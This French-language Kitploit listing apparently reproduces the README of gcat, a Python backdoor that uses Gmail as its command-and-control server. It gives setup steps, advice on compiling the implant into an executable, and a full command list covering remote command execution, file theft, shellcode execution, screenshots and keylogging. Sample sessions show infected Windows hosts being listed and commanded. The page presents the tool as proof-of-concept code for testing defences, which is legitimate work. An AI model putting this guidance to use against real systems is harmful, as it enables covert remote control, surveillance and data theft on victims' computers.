Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
gcat — Un backdoor PoC qui utilise Gmail comme serveur C&C | Kitploit
Outils/GitHubGitHub/byt3bl33d3r/gcat
ExploitationPost-ExploitationTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges UtilesCheval de Troie d'Accès à DistanceArchived
GitHubbyt3bl33d3r/gcat

gcat

Un backdoor PoC qui utilise Gmail comme serveur C&C

Voir le dépôt
1.4k4168il y a 7 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Gcat

Un backdoor furtif basé sur Python utilisant Gmail comme serveur de commande et contrôle

Ce projet s'inspire du code PoC original de Benjamin Donnelly

Ceci est un code de preuve de concept...

... qui a été publié pour que les organisations testent leurs défenses contre ce type d'attaques. Pour les détecter, consultez des projets comme RITA.

Pour une version plus récente et maintenue de ce projet, voir GDog

Configuration

Pour que cela fonctionne, vous avez besoin :

  • Un compte Gmail (Utilisez un compte dédié ! N'utilisez pas votre compte personnel !)
  • Activez « Autoriser les applications moins sécurisées » dans les paramètres de sécurité du compte
  • Vous devrez peut-être aussi activer IMAP dans les paramètres du compte

Ce dépôt contient deux fichiers :

  • gcat.py un script utilisé pour énumérer et envoyer des commandes aux clients disponibles
  • implant.py le vrai backdoor à déployer

Dans les deux fichiers, modifiez les variables gmail_user et gmail_pwd avec le nom d'utilisateur et le mot de passe du compte que vous avez précédemment configuré.

Vous voudrez probablement compiler en un exécutable en utilisant

Télécharger l’outil
implant.py
Pyinstaller

Remarque : Il est recommandé de compiler implant.py avec une installation Python 32 bits

Utilisation

root@kitploit:~
                                             dP   
                                             88   
                .d8888b. .d8888b. .d8888b. d8888P 
                88'  `88 88'  `"" 88'  `88   88   
                88.  .88 88.  ... 88.  .88   88   
                `8888P88 `88888P' `88888P8   dP   
                     .88                          
                 d8888P  
                     

                   .__....._             _.....__,
                     .": o :':         ;': o :".
                     `. `-' .'.       .'. `-' .'   
                       `---'             `---'  

             _...----...      ...   ...      ...----..._
          .-'__..-''----    `.  `"`  .'    ----'''-..__`-.
         '.-'   _.--'''       `-._.-'       ''''--._   `-.`
         '  .-"'                  :                  `"-.  `
           '   `.              _.'"'._              .'   `
                 `.       ,.-'"       "'-.,       .'
                   `.                           .'
              jgs    `-._                   _.-'
                         `"'--...___...--'"`

                     ...IM IN YUR COMPUTERZ...

                        WATCHIN YUR SCREENZ

arguments optionnels :
  -h, --help            affiche ce message d'aide et quitte
  -v, --version         affiche le numéro de version du programme et quitte
  -id ID                Client cible
  -jobid JOBID          Identifiant de tâche à récupérer

  -list                 Liste des clients disponibles
  -info                 Récupère les informations sur le client spécifié

Commandes :
  Commandes à exécuter sur un implant

  -cmd CMD              Exécute une commande système
  -download PATH        Télécharge un fichier depuis le système d'un client
  -upload SRC DST       Téléverse un fichier vers le système du client
  -exec-shellcode FILE  Exécute du shellcode fourni sur un client
  -screenshot           Prend une capture d'écran
  -lock-screen          Verrouille l'écran du client
  -force-checkin        Force une vérification
  -start-keylogger      Démarre le keylogger
  -stop-keylogger       Arrête le keylogger

Meow!

  • Une fois que vous avez déployé le backdoor sur quelques systèmes, vous pouvez vérifier les clients disponibles avec la commande list :
root@kitploit:~
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

La sortie est une chaîne UUID qui identifie de manière unique le système et le système d'exploitation sur lequel l'implant s'exécute

  • Envoyons une commande à un implant :
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

Ici, nous demandons à 90b2cd83-cb36-52de-84ee-99db6ff41a11 d'exécuter ipconfig /all, le script affiche alors le jobid que nous pouvons utiliser pour récupérer la sortie de cette commande

  • Obtenons les résultats !
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • C'est l'essentiel ! Mais vous pouvez faire bien plus, comme vous le voyez dans l'utilisation du script ! ;)

À faire

  • Prise en charge multi-plateforme
  • Commande pour téléverser des fichiers
  • Cryptage du transport et obfuscation